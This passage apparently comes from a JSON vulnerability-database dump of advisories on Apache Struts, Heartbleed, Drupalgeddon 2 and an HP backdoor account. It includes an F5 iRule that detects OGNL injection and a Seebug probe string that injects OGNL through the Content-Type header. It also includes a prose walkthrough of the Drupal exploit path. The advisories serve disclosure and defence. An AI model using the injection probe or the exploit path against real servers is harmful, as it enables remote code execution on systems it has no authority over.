iRule.\n 5. Enter the following iRule in the **Definition** field: \n\nwhen HTTP_REQUEST { \nset content_type [URI::decode [HTTP::header \"Content-Type\"]] \nset content_disposition [URI::decode [HTTP::header \"Content-Disposition\"]] \n \nif {(($content_type contains \"$\\\\{\") || ($content_type contains \"%\\\\{\") || \n($content_disposition contains \"$\\\\{\") || ($content_disposition contains \"%\\\\{\"))} { \nlog local0. \"Possible CVE-2017-5638 - Content-Type or Content-Disposition HTTP header contains OGNL phrasing from [IP::client_addr]\" \n#Comment out the following two lines and uncomment the 'reject' to silently reject the connection \nHTTP::respond 403 content \"&lt;html&gt;&lt;head&gt;&lt;title&gt;Invalid Request&lt;/title&gt;&lt;/head&gt;&lt;body&gt;HTTP Status 403: Invalid Request&lt;/body&gt;&lt;/html&gt;\" \nreturn \n#reject \n} \n \n#Check for more than one Content-Type Header for potential CVE 2017-5638 evasion \n#Check for more than one Content-Disposition Header for potential CVE 2017-5638 evasion \nset num_ct 0 \nset num_cd 0 \n \nforeach header_name [HTTP::header names] { \nset header_name_lower [string tolower $header_name] \n \nif { ( [URI::decode $header_name_lower] matches \"content-type\" ) } { \nincr num_ct \n} \n \nif { ( [URI::decode $header_name_lower] matches \"content-disposition\" ) } { \nincr num_cd \n} \n} \n \nif { ( $num_ct &gt; 1 || $num_cd &gt; 1 ) } { \nlog local0. \"Possible CVE 2017-5638 evasion - Request contains more than one Content-Type or Content-Disposition HTTP Request Header to host [HTTP::host] from [IP::client_addr]\" \n#Comment out the following two lines and uncomment the 'reject' to silently reject the connection \nHTTP::respond 403 content \"&lt;html&gt;&lt;head&gt;&lt;title&gt;Invalid Request&lt;/title&gt;&lt;/head&gt;&lt;body&gt;HTTP Status 403: Invalid Request&lt;/body&gt;&lt;/html&gt;\" \nreturn \n#reject \n} \n \nSTREAM::disable \nSTREAM::expression {@[^\\n]*Content-.*[:\"][^\\r\\n\\t\\f]*[$%]{.*}[\"^\\n]?@\\x20@} \n#Alternative expression below matches only on the name= and filename= elements of the Content-Disposition header \n#Consider using this if you are more sensitive to potential false-positives for OGNL phrasing elsewhere \n#STREAM::expression {@[^\\n]*[nN][aA][mM][eE][\\x20\\x09]*=[^\\n]*[\\x24\\x25][\\x20\\x09\\x00]*\\x7b[^\\n]*@\\x20@} \nSTREAM::enable \n} \n \nwhen STREAM_MATCHED { \nlog local0. \"Posible CVE-2017-5638 S2-046 - request contains OGNL phrasing after a Content-.* body directive from [IP::client_addr]: [STREAM::match]\" \nreject \n# Earlier versions (prior to 11.0) of BIG-IP cannot reject or respond here, but the STREAM expression replaces the attack with a space (\\x20) \n}\n\n 6. Comment or un-comment sections of code as desired per instructions within the iRule.\n 7. Click **Finished**.\n 8. Navigate to **Local Traffic** &gt; **Virtual Servers** &gt; **Virtual Server List**.\n 9. In the **Resources** column for the virtual server you want, click **Edit**.\n 10. In the **iRules** section, click **Manage**.\n 11. In the **Available** box, select the iRule that you created in step 5.\n 12. Click **&lt;&lt;** to move the desired iRule to the **Enabled** box.\n 13. Click **Finished**.\n\n * [DevCentral: Apache Struts Remote Code Execution Vulnerability](<https://devcentral.f5.com/articles/apache-struts-remote-code-execution-vulnerability-cve-2017-5638-25617>)\n\n**Note**: A DevCentral login is required to access this content.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "modified": "2017-04-04T22:24:00", "published": "2017-03-09T23:36:00", "href": "https://support.f5.com/csp/article/K43451236", "id": "F5:K43451236", "title": "Apache Struts 2 vulnerability CVE-2017-5638", "type": "f5", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-26T17:23:23", "bulletinFamily": "software", "description": "**Important**: For the hotfixes noted previously, the included version of OpenSSL has not been changed. F5 has patched the existing version of OpenSSL to resolve this vulnerability. As a result, on a patched BIG-IP system, the OpenSSL version is still OpenSSL 1.0.1e-fips. For more information about installed hotfix versions, refer to SOL13123: Managing BIG-IP product hotfixes (11.x).\n\n**BIG-IP Edge Client fixes** \n\n\nThis issue has been fixed for BIG-IP Edge Clients for Windows, Mac OS, and Linux in BIG-IP APM 11.5.1 HF2, and 11.5.0 HF3. This issue has also been fixed for BIG-IP Edge Clients for Windows, Mac OS, and Linux in an engineering hotfix in other BIG-IP APM versions. You can obtain the engineering hotfix by contacting [F5 Technical Support](<http:// http://www.f5.com/training-support/customer-support/contact/>) and referencing this article number and the associated ID number. Note that engineering hotfixes are intended to resolve a specific software issue until a suitable minor release, maintenance release, or cumulative hotfix rollup release is available that includes the software fix. For more information, refer to SOL8986: F5 software lifecycle policy.\n\nRecommended action\n\nYou can eliminate this vulnerability by running a version listed in the **Versions known to be not vulnerable** column. If the **Versions known to be not vulnerable** column does not list a version that is higher than the version you are running, then no upgrade candidate currently exists.\n\nUpgrading to a version known to be not vulnerable, or taking steps to mitigate this vulnerability, does not eliminate possible damage that may have already occurred as a result of this vulnerability. After upgrading to a version that is known to be not vulnerable, consider the following components that may have been compromised by this vulnerability:\n\nSSL profile certificate/key pairs\n\nThe BIG-IP SSL profiles may reference SSL certificate/key pairs that were compromised. For information about creating new SSL certificate/key pairs for SSL profiles, refer to the following articles:\n\n * SOL14620: Managing SSL certificates for BIG-IP systems\n * SOL14534: Creating SSL certificates and keys with OpenSSL (11.x) \n\n * SOL13579: Generating new default certificate and key pairs for BIG-IP SSL profiles\n\nBIG-IP device certificate/key pairs\n\nThe BIG-IP system may have a device certificate/key pair that was compromised. For information about creating new SSL certificate/key pairs, refer to the following articles:\n\n * SOL9114: Creating an SSL device certificate and key pair using OpenSSL\n * SOL7754: Renewing self-signed device certificates\n\n**Important**: After you generate a new device certificate and private key pair, you will need to re-establish device trusts. In addition, the device certificates are used for GTM sync groups and Enterprise Manager monitoring. As a result, you will need to recreate the GTM sync groups and rediscover devices managed by Enterprise Manager.\n\nCMI certificate/key pairs\n\nThe BIG-IP system may have a CMI certificate/key pair (used for device group communication and synchronization) that was compromised. To regenerate the CMI certificate/key pairs on devices in a device group, and rebuild the device trust, perform the following procedure:\n\n**Impact of procedure**: F5 recommends that you perform this procedure during a maintenance window. This procedure causes the current device to lose connectivity with all other BIG-IP devices. Depending on the device group and traffic group configuration, the connectivity loss may result in an unintentional active-active condition that causes a traffic disruption. To prevent a standby device from going active, set the standby device in the device group to **Force Offline** before performing the procedure. Standby devices that were set to **Force Offline** should be set to **Release Offline** after performing the procedure.\n\n 1. Log in to the Configuration utility.\n 2. Navigate to **Device Management **&gt; **Device Trust** &gt; **Local Domain**.\n 3. Click **Reset Device Trust**.\n 4. Select the **Generate new self-signed authority** option.\n 5. Click **Update** (or **Next**).\n 6. Click **Finished**.\n\nRepeat this procedure for each device in the device group. \n\n\nAfter you complete the device trust reset on all devices, set up the device trust by performing the procedures described in the following articles:\n\n * SOL13649: Creating a device group using the Configuration utility\n * SOL13639: Creating a device group using the Traffic Management Shell\n * SOL13946: Troubleshooting ConfigSync and device service clustering issues (11.x)\n\nThe big3d process \n\n\nThe BIG-IP system may have a vulnerable version of the** big3d **process under the following conditions:\n\n * The BIG-IP GTM system is running 11.5.0 or 11.5.1.\n * The managed BIG-IP system is running a **big3d** process that was updated by an affected BIG-IP GTM system. For example, the **big3d** process included by default on a BIG-IP LTM system running 11.4.0 is not vulnerable by itself. However, if a BIG-IP GTM system running 11.5.0 or 11.5.1 installs **big3d** 11.5.0 on the BIG-IP LTM system, the BIG-IP LTM system becomes vulnerable due to the affected **big3d **process.\n * The Enterprise Manager system is running 3.1.1 HF1 or HF2.\n * The managed BIG-IP system is running a **big3d** process that was updated by an affected Enterprise Manager system. For example, the **big3d** process included by default on a BIG-IP LTM system running 11.4.0 is not vulnerable by itself. However, if an Enterprise Manager system running 3.1.1 HF1 or HF2 installs **big3d** on the BIG-IP LTM system, the BIG-IP LTM system becomes vulnerable due to the affected **big3d **process.\n\n**Affected big3d versions**\n\nThe following **big3d** versions are affected by this vulnerability:\n\n * big3d version 11.5.0.0.0.221 for Linux \n\n * big3d version 11.5.0.1.0.227 for Linux \n\n * big3d version 11.5.1.0.0.110 for Linux \n\n\nFor information about checking the **big3d** version currently installed on the system and installing updated** big3d **versions on managed systems, refer to the following article:\n\n * SOL13703: Overview of big3d version management \n\n\nBIG-IP maintenance and user passwords \n\n\nThe maintenance and user passwords used to access the BIG-IP system may have been compromised. For information about changing user passwords, refer to the following documentation:\n\n * SOL13121: Changing system maintenance account passwords (11.x)\n * BIG-IP TMOS: Concepts guide \n\n\n**Mitigating this vulnerability**\n\nTo mitigate this vulnerability, you should consider the following recommendations: \n\n\n * Consider denying access to the Configuration utility and using only the command line and** tmsh** until the BIG-IP system is updated. If that is not possible, F5 recommends that you access the Configuration utility only over a secure network.\n * If SSL profiles are configured to use COMPAT ciphers, consider reconfiguring the profiles to use ciphers from the NATIVE SSL stack. For information about the NATIVE and COMPAT ciphers, refer to the following articles: \n \n\n * SOL13163: SSL ciphers supported on BIG-IP platforms (11.x)\n * SOL13171: Configuring the cipher strength for SSL profiles (11.x)\n * SOL13187: COMPAT SSL ciphers are no longer included in standard cipher strings\n * Virtual servers that do not use SSL profiles and pass SSL traffic through to the back-end web servers will not protect the back-end resource servers. When possible, you should protect back-end resources by using SSL profiles to terminate SSL. For more information about using iRules to protect the back-end servers, refer to the Supplemental Information section.\n\nSupplemental Information\n\n * [CVE-2014-0160](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160>)\n * <http://heartbleed.com/> \n \n**Important**: The following DevCentral article contains additional information about using iRules to assist in mitigating this vulnerability when terminating TLS traffic on back-end servers. F5 does not officially support the iRules in the following article, and information in the article does not represent a fix for the vulnerability.\n * [DevCentral article: OpenSSL HeartBleed, CVE-2014-0160](<http://devcentral.f5.com/articles/openssl-heartbleed-cve-2014-0160>)\n * SOL14783: Overview of the Client SSL profile (11.x)\n * SOL12463: Overview of F5 Edge products\n * SOL13757: BIG-IP Edge Client version matrix\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL13123: Managing BIG-IP product hotfixes (11.x)\n * SOL10025: Managing BIG-IP product hotfixes (10.x)\n * SOL9502: BIG-IP hotfix matrix\n * SOL10322: FirePass hotfix matrix\n", "modified": "2015-02-16T00:00:00", "published": "2014-04-08T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/100/sol15159.html", "id": "SOL15159", "title": "SOL15159 - OpenSSL vulnerability CVE-2014-0160", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "seebug": [{"lastseen": "2017-11-19T12:02:40", "bulletinFamily": "exploit", "description": "In this post I'll describe how I customized a standard lgtm query to find a remote code execution vulnerability in [Apache Struts](https://struts.apache.org/). A more general announcement about this vulnerability [can be found here](https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement). It has been assigned [CVE-2017-9805](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9805), a security bulletin can be found here on the Struts website, and details of version 2.5.13 of Apache Struts that addresses this vulnerability [are available here](https://struts.apache.org/announce.html). Due to the severe nature of this vulnerability, a couple of details (including a working exploit) have been omitted from this post; this information will be added in a few weeks' time.\r\n\r\nWe strongly advise users of Struts to upgrade to the latest version to mitigate this security risk.\r\n\r\nThe vulnerability I discovered is a result of unsafe deserialization in Java. Multiple similar vulnerabilities have come to light in recent years, after Chris Frohoff and Gabriel Lawrence discovered a deserialization flaw in Apache Commons Collections that can lead to arbitrary code execution. Many Java applications have since been affected by such vulnerabilities. If you'd like to know more about this type of vulnerability, the lgtm documentation page on this topic is a good place to start.\r\n# Detecting unsafe deserialization in Struts #\r\n\r\nlgtm identifies alerts in code using queries written in a specially-designed language: QL. One of the many queries for Java detects potentially unsafe deserialization of user-controlled data. The query identifies situations in which unsanitized data is deserialized into a Java object. This includes data that comes from an HTTP request or from any other socket connection.\r\n\r\nThis query detects common ways through which user-controlled data flows to a deserialization method. However, some projects use a slightly different approach to receive remote user input. For example, Apache Struts uses the ContentTypeHandler interface. This converts data into Java objects. Since implementations of this interface usually deserialize the data passed to them, every class that implements this interface is potentially of interest. The standard QL query for detecting unsafe deserialization of user-controlled data can easily be adapted to recognize this additional method for processing user input. This is done by defining a custom data source.\r\n\r\nIn this case, we are interested in data flowing from the toObject method, which is defined in the ContentTypeHandler interface:\r\n\r\n void toObject(Reader in, Object target);\r\n\r\nThe data contained in the first argument in that is passed to toObject should be considered tainted: it is under the control of a remote user and should not be trusted. We want to find places where this tainted data (the source) flows into a deserialization method (a sink) without input validation or sanitization.\r\n\r\nThe QL DataFlow library provides functionality for tracking tainted data through various steps in the source code. This is known as taint tracking. For example, data gets tracked through various method calls:\r\n\r\n IOUtils.copy(remoteUserInput, output); // output is now also tainted because the function copy preserves the data.\r\n\r\nTo make use of the taint tracking functionality in the DataFlow library, let's define the in argument to ContentTypeHandler.toObject(...) as a tainted source. First, we define how the query should recognize the ContentTypeHandler interface and the method toObject.\r\n\r\n\t/** The ContentTypeHandler Java class in Struts **/\r\n\tclass ContentTypeHandler extends Interface {\r\n\t ContentTypeHandler() {\r\n\t this.hasQualifiedName(\"org.apache.struts2.rest.handler\", \"ContentTypeHandler\")\r\n\t }\r\n\t}\r\n\t\r\n\t/** The method `toObject` */\r\n\tclass ToObjectDeserializer extends Method {\r\n\t ToObjectDeserializer() {\r\n\t this.getDeclaringType().getASupertype*() instanceof ContentTypeHandler and\r\n\t this.getSignature = \"toObject(java.io.Reader,java.lang.Object)\"\r\n\t }\r\n\t}\r\n\r\nHere we use getASupertype*() to restrict the matching to any class that has ContentTypeHandler as a supertype.\r\n\r\nNext we want to mark the first argument of the toObject method as an untrusted data source, and track that data as it flows through the code paths. To do that, we extend the FlowSource class in QL's dataflow library:\r\n\r\n\t/** Mark the first argument of `toObject` as a dataflow source **/\r\n\tclass ContentTypeHandlerInput extends FlowSource {\r\n\t ContentTypeHandlerInput() {\r\n\t exists(ToObjectDeserializer des |\r\n\t des.getParameter(0).getAnAccess() = this\r\n\t )\r\n\t }\r\n\t}\r\n\r\nIntuitively, this definition says that any access to the first parameter of a toObject method, as captured by ToObjectDeserializer above, is a flow source. Note that for technical reasons, flow sources have to be expressions. Therefore, we identify all accesses of that parameter (which are expressions) as sources, rather than the parameter itself (which isn't).\r\n\r\nNow that we have the definition for a dataflow source, we can look for places where this tainted data is used in an unsafe deserialization method. We don't have to define that method (the sink) ourselves as it is already in the Deserialization of user-controlled data query (line 64: UnsafeDeserializationSink, we will need to copy its definition into the query console). Using this, our final query becomes:\r\n\r\n\tfrom ContentTypeHandlerInput source, UnsafeDeserializationSink sink\r\n\twhere source.flowsTo(sink)\r\n\tselect source, sink\r\n\r\nHere we use the .flowsTo predicate in FlowSource for tracking so that we only identify the cases when unsafe deserialization is performed on a ContentTypeHandlerInput source.\r\n\r\nWhen I ran the customized query on Struts there was exactly one result (Running it now will yield no result as the fix has been applied). I verified that it was a genuine remote code execution vulnerability before reporting it to the Struts security team. They have been very quick and responsive in working out a solution even though it is a fairly non-trivial task that requires API changes. Due to the severity of this finding I will not disclose more details at this stage. Rather, I will update this blog post in a couple of weeks' time with more information.\r\n# Vendor Response #\r\n\r\n 17 July 2017: Initial disclosure.\r\n 02 August 2017: API changes in preparation for patch.\r\n 14 August 2017: Patch from Struts for review.\r\n 16 August 2017: Vulnerability officially recognized as CVE-2017-9805\r\n 5 September 2017: Struts version 2.5.13 released\r\n\r\n# Mitigate unsafe deserialization risk with lgtm #\r\n\r\nlgtm runs the standard Deserialization of user-controlled data query on all Java projects. If your project uses deserialization frameworks detected by that query, and has user-controlled data reaching a deserialization method, you may see relevant alerts for this query on lgtm.com. Check any results carefully. You can also enable lgtm's pull request integration to prevent serious security issues like these from being merged into the code base in the first place.\r\n\r\nIf your project uses other deserialization frameworks, then you can use the query console to create your own custom version of the standard query.", "modified": "2017-09-06T00:00:00", "published": "2017-09-06T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96420", "id": "SSV:96420", "type": "seebug", "title": "Apache Struts2 S2-052 (CVE-2017-9805)", "sourceData": "", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": ""}, {"lastseen": "2018-06-08T07:10:20", "bulletinFamily": "exploit", "description": "Two weeks ago, a highly critical (21/25 NIST rank) vulnerability, nicknamed Drupalgeddon 2 (SA-CORE-2018-002 / CVE-2018-7600), was disclosed by the Drupal security team. This vulnerability allowed an unauthenticated attacker to perform remote code execution on default or common Drupal installations.\r\n\r\nDrupal is an open-source content management system (CMS) that is used by more than one million sites around the world (including governments, e-retail, enterprise organizations, financial institutions and more), all of which are vulnerable unless patched.\r\n\r\nUntil now details of the vulnerability were not available to the public, however, Check Point Research can now expand upon this vulnerability and reveal exactly how it works.\r\n\r\nIn brief, Drupal had insufficient input sanitation on Form API (FAPI) AJAX requests. As a result, this enabled an attacker to potentially inject a malicious payload into the internal form structure. This would have caused Drupal to execute it without user authentication. By exploiting this vulnerability an attacker would have been able to carry out a full site takeover of any Drupal customer.\r\n\r\nThe vulnerability existed on all Drupal versions from 6 to 8, though has since been patched to those who manually update their site. In this document we will showcase real life attack scenarios around an out-of-the-box installation of Drupal\u2019s flagship product, Drupal 8.\r\n\r\n### Technical Details\r\n\r\n#### The Vulnerability\r\n\r\nTo provide some background, Drupal\u2019s Form API was introduced in Drupal 6 and allowed alteration of the form data during the form rendering process. This revolutionized the way markup processing was done.\r\n\r\nIn Drupal 7 the Form API was generalized to what is now known as \u201cRenderable Arrays\u201d. This extended API is used to represent the structure of most of the UI elements in Drupal, such as pages, blocks, nodes and more.\r\n\r\nRenderable arrays contain metadata that is used in the rendering process. These renderable arrays are a key-value structure in which the property keys start with a hash sign (#). Please see below for an example:\r\n```\r\n[\r\n\u2018#type\u2019 => \u2018markup\u2019,\r\n\u2018#markup\u2019 => \u2018<em>some text</em>\u2019,\r\n\u2018#prefix\u2019 => \u2018<div>\u2019,\r\n\u2018#suffix\u2019 => \u2018</div>\u2019\r\n]\r\n```\r\n\r\n#### Drupal\u2019s Patch\r\n\r\nThe patch that Drupal published adds a single class called RequestSanitizer with a stripDangerousValues method that unsets all the items in an input array for keys that start with a hash sign. This method sanitizes input data in `$_GET`, `$_POST` & `$_COOKIES` during the very early stages of Drupal\u2019s bootstrap (immediately after loading the site configurations).\r\n\r\nWe assume that one of the reasons that the patch was done in this way was to make it harder to find and exploit the vulnerability.\r\n\r\n#### Finding an Attack Vector\r\n\r\nBecause of the above we focused on forms that are exposed to anonymous users.\r\n\r\nThere are a few of those forms available, one of which is the user registration form. This form contains multiple fields, as can be seen in the screenshot below.\r\n\r\n\r\n\r\nFigure 1: The Drupal registration form.\r\n\r\nWe knew that we needed to inject a renderable array somewhere in the form structure, we just had to find out where.\r\n\r\nAs it happens, the \u201cEmail address\u201d field does not sanitize the type of input that it receives. This allowed us to inject an array to the form array structure (as the value of the email field).\r\n\r\n\r\n\r\nFigure 2: Injecting our renderable array into the mail input of the registration form.\r\n\r\n\r\n\r\nFigure 3: Example of injected form renderable array.\r\n\r\nNow all we needed was for Drupal to render our injected array. Since Drupal treats our injected array as a value and not as an element, we needed to trick Drupal into rendering it.\r\n\r\nThe situations in which Drupal renders arrays are as follows:\r\n\r\n1. Page load\r\n2. Drupal AJAX API \u2013 i.e. when a user fills an AJAX form, a request is made to Drupal which renders an HTML markup and updates the form.\r\n\r\n\r\nAfter investigating possible attack vectors surrounding the above functionalities, because of the post-submission rendering process and the way Drupal implements it, we came to the conclusion that an AJAX API call is our best option to leverage an attack.\r\n\r\nAs part of the user registration form, the \u201cPicture\u201d field uses Drupal\u2019s AJAX API to upload a picture into the server and replace it with a thumbnail of the uploaded image.\r\n\r\n\r\n\r\nFigure 4: Form used to upload a picture using AJAX API.\r\n\r\nDiving into the AJAX file upload callback revealed that it uses a GET parameter to locate the part of the form that needs to be updated in the client.\r\n\r\n\r\n\r\nFigure 5: The AJAX \u2018upload file\u2019 callback function code.\r\n\r\nAfter pointing element_parents to the part of the form that contained our injected array, Drupal successfully rendered it.\r\n\r\n#### Weaponizing Drupalgeddon 2\r\n\r\nNow, all we had to do is to inject a malicious render array that uses one of Drupal\u2019s rendering callback to execute code on the system.\r\n\r\nThere were several properties we could have injected:\r\n\r\n* #access_callback\r\n\t* Used by Drupal to determine whether or not the current user has access to an element.\r\n* #pre_render\r\n\t* Manipulates the render array before rendering.\r\n* #lazy_builder\r\n\t* Used to add elements in the very end of the rendering process.\r\n* #post_render\r\n\t* Receives the result of the rendering process and adds wrappers around it.\r\n\t\r\n\t\r\nFor our POC to work, we chose the #lazy_builder element as the one being injected into the mail array. Combined with the AJAX API callback functionality, we could direct Drupal to render our malicious array.\r\n\r\nThis allowed us to take control over the administrator\u2019s account, install a malicious backdoor module and finally execute arbitrary commands on the server.\r\n\r\n\r\n\r\nFigure 6: injecting malicious command into one of Drupal\u2019s rendering callbacks.\r\n\r\n\r\n\r\nFigure 7: Successfully executing shell commands using the malicious module.\r\n\r\n### Conclusion\r\n\r\nAfter seeing earlier publications on Twitter and several security blogs, it was apparent that there was much confusion among the community regarding this vulnerability announcement, with some even doubting the severity of it. As a result, we considered it worthwhile to looking deeper into.\r\n\r\nThe research however was challenging as we were starting from a very large attack surface since the patch blurred the real attack vectors. To expedite our findings, we were fortunate to be joined by experts in the Drupal platform. The final results highlight how easy it is for organization to be exposed through no fault of their own, but rather through the third party platforms they use every day.", "modified": "2018-03-30T00:00:00", "published": "2018-03-30T00:00:00", "id": "SSV:97207", "href": "https://www.seebug.org/vuldb/ssvid-97207", "type": "seebug", "title": "Drupal core Remote Code Execution(CVE-2018-7600)\n (Drupalgeddon2)", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T12:01:16", "bulletinFamily": "exploit", "description": "Based on the Jakarta plugin plugin Struts remote code execution vulnerability, a malicious user can upload a file by modifying the HTTP request header Content-Type value to trigger the vulnerability, and then execute the system command.\n\nSound detection method(the detection method by the constant company): the In to the server to issue the http request packet, modify the Content-Type field: `Content-Type:%{#context['com. opensymphony. xwork2. dispatcher. HttpServletResponse']. addHeader('vul','vul')}. multipart/form-data`\n\nSuch as the return response packets in the presence of vul: the vul field entry then indicates the presence of vulnerability.\n", "modified": "2017-03-06T00:00:00", "published": "2017-03-06T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92746", "id": "SSV:92746", "type": "seebug", "title": "S2-045: Struts 2 Remote Code Execution vulnerability\uff08CVE-2017-5638\uff09", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T12:05:43", "bulletinFamily": "exploit", "description": "It is possible to perform a RCE attack with a malicious Content-Disposition value or with improper Content-Length header. If the Content-Dispostion / Content-Length value is not valid an exception is thrown which is then used to display an error message to a user. This is a different vector for the same vulnerability described in [S2-045](https://cwiki.apache.org/confluence/display/WW/S2-045) (CVE-2017-5638).", "modified": "2017-03-21T00:00:00", "published": "2017-03-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92804", "id": "SSV:92804", "type": "seebug", "title": "S2-046: Struts 2 Remote Code Execution vulnerability\uff08CVE-2017-5638\uff09", "sourceData": "", "sourceHref": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T18:44:46", "bulletinFamily": "exploit", "description": "BUGTRAQ ID: 37086\r\nCVE ID: CVE-2009-3843\r\n\r\nHP Operations Manager\u662f\u7528\u4e8e\u534f\u8c03IT\u57fa\u7840\u67b6\u6784\u4e2d\u7f51\u7edc\u3001\u6700\u7ec8\u7528\u6237\u4f53\u9a8c\u4e8b\u4ef6\u7684\u7efc\u5408\u4e8b\u4ef6\u548c\u6027\u80fd\u7ba1\u7406\u63a7\u5236\u53f0\u3002\r\n\r\nHP Operations Manager\u7684Tomcat\u7528\u6237XML\u6587\u4ef6\u4e2d\u5b58\u5728\u9690\u85cf\u7684\u8d26\u53f7\uff0c\u6076\u610f\u7528\u6237\u53ef\u4ee5\u4f7f\u7528\u8fd9\u4e2a\u8d26\u53f7\u8bbf\u95eeorg.apache.catalina.manager.HTMLManagerServlet\u7c7b\uff0c\u800c\u8fd9\u4e2aservlet\u5141\u8bb8\u8fdc\u7a0b\u7528\u6237\u901a\u8fc7POST\u8bf7\u6c42\u5411/manager/html/upload\u4e0a\u4f20\u6587\u4ef6\u3002\u5982\u679c\u653b\u51fb\u8005\u4e0a\u4f20\u4e86\u6076\u610f\u5185\u5bb9\uff0c\u4e4b\u540e\u5c31\u53ef\u4ee5\u5728\u670d\u52a1\u5668\u4e0a\u8bbf\u95ee\u5e76\u4ee5SYSTEM\u7528\u6237\u6743\u9650\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\n\nHP Operations Manager 8.10\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nHP\r\n--\r\nHP\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08HPSBMA02478\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nHPSBMA02478\uff1aSSRT090251 rev.1 - HP Operations Manager for Windows, Remote Unauthorized Access\r\n\u94fe\u63a5\uff1ahttp://alerts.hp.com/r?2.1.3KT.2ZR.zWmfi.DtgsGC..T.Lt1%5f.2ODk.bW89MQ%5f%5fDNLKFTH0\r\n\r\n\u8865\u4e01\u4e0b\u8f7d\uff1a\r\nhttp://support.openview.hp.com/selfsolve/patches", "modified": "2009-11-24T00:00:00", "published": "2009-11-24T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-14974", "id": "SSV:14974", "type": "seebug", "title": "HP Operations Manager 8.10 \u540e\u95e8\u8d26\u53f7\u6f0f\u6d1e", "sourceData": "", "sourceHref": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cloudfoundry": [{"lastseen": "2019-05-29T18:33:00", "bulletinFamily": "software", "description": "# \n\n# **Severity**\n\nAdvisory/Critical\n\n# **Vendor**\n\nApache\n\n# **Versions Affected**\n\n * Apache Struts 2:\n * 2.3.x versions prior to 2.3.34\n * 2.5.x versions prior to 2.5.13\n\n# **Description**\n\nAn RCE attack is possible when using the Struts REST plugin with XStream handler to deserialise XML requests [1].\n\n# **Affected Cloud Foundry Products and Versions**\n\n * The Cloud Foundry team has determined that core releases do not package Apache Struts.\n * However, particular applications deployed on Cloud Foundry may depend on Apache Struts 2. This vulnerability should be mitigated on the application level as soon as possible by following the steps outlined in the Struts documentation [1].\n\n# **Mitigation**\n\n * The Cloud Foundry team has determined that the project is not exposed to this particular vulnerability and therefore does not require any Cloud Foundry-specific upgrades.\n * However, particular applications deployed on Cloud Foundry may depend on Apache Struts 2. This vulnerability should be mitigated on the application level as soon as possible by following the steps outlined in the Struts documentation [1].\n\n# **Credit**\n\nMan Yue Mo\n\n# **References**\n\n[1] [https://struts.apache.org/docs/s2-052.html](<https://struts.apache.org/docs/s2-052.html>)\n\n[2] <https://struts.apache.org/announce.html#a20170907>\n\n[3] <https://struts.apache.org/announce.html#a20170905>\n", "modified": "2017-09-08T00:00:00", "published": "2017-09-08T00:00:00", "id": "CFOUNDRY:3B3A927B1B8E5A80A8EA38A6AACF98EE", "href": "https://www.cloudfoundry.org/blog/cve-2017-9805/", "title": "CVE-2017-9805: Apache Struts Remote Code Execution | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-11T02:54:32", "bulletinFamily": "software", "description": "CVE-2014-0160 Heartbleed\n\n# \n\nCritical\n\n# Vendor\n\nOpenSSL.org\n\n# Versions Affected\n\n * 1.0.1 through 1.0.1f\n\n# Description\n\nThe (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.\n\n# Affected VMware Products and Versions\n\n_Severity is critical unless otherwise noted. \n_\n\n * vFabric Web Server 5.0.x, 5.1.x, 5.2.x, 5.3.x\n * vFabric GemFire Native Client 7.0.0.X, 7.0.1.X\n * VMware GemFire Native Client 7.0.2.X\n * VMware Command Center 2.0.x, 2.1.x\n * VMware App Suite Virtual Appliance 1.0.1.3\n\n# Mitigation\n\nUsers of affected versions should apply the following mitigation:\n\n * vFabric Web Server users (all versions) should apply the patch including version 1.0.1g of OpenSSL per the instructions posted here as soon as possible.\n * GemFire Native Client 7.0.X users should immediately upgrade to OpenSSL 1.0.1g or later or recompile their existing OpenSSL 